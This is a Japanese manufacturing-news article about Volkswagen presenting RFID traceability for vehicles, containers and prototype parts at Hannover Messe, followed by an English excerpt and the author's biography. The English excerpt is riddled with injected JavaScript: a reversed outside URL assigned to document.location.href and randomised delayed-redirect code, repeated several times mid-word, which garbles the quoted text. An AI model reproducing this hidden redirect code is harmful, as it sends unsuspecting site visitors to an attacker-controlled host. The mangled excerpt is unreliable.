フォルクスワーゲン、RFIDで製造工程をデジタル改革

フォルクスワーゲン、RFIDで製造工程をデジタル改革

25日から開催しているドイツのハノーバーメッセで、フォルクスワーゲン(VW)は、RFIDを使った製造工程のデジタル化について紹介した。

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VWでは、車両とコンテナ、試作部品にRFIDの送受信機を取り付けて、トレーサビリティができるようにしているとのこと。

詳細は下記から

RFID at VW: Innovating with Existing Technology
Besides his responsibility for the RFID strategy at Volkswagen, Schmidt is also the President of the German Association of the Autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomotive Industry (VDA e.V.). In recent years, the VDA has promoted uniform standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andards for RFID communication – now, there are clear recommendations. They are essential if suppliers andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomotive manufacturers are toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to establish a seamlessly traceable supply chain.

出典:ハノーバーメッセ RFID at VW: Innovating with Existing Technology 

 

 


1975年群馬県生まれ。明治大学院修了後、エレクトロニクス業界専門紙・電波新聞社入社。名古屋支局、北陸支局長を経て、2007年日本最大の製造業ポータルサイト「イプロス」で編集長を務める。2015年3月〜「オートメーション新聞」編集長(現職)。趣味は釣りとダーツ。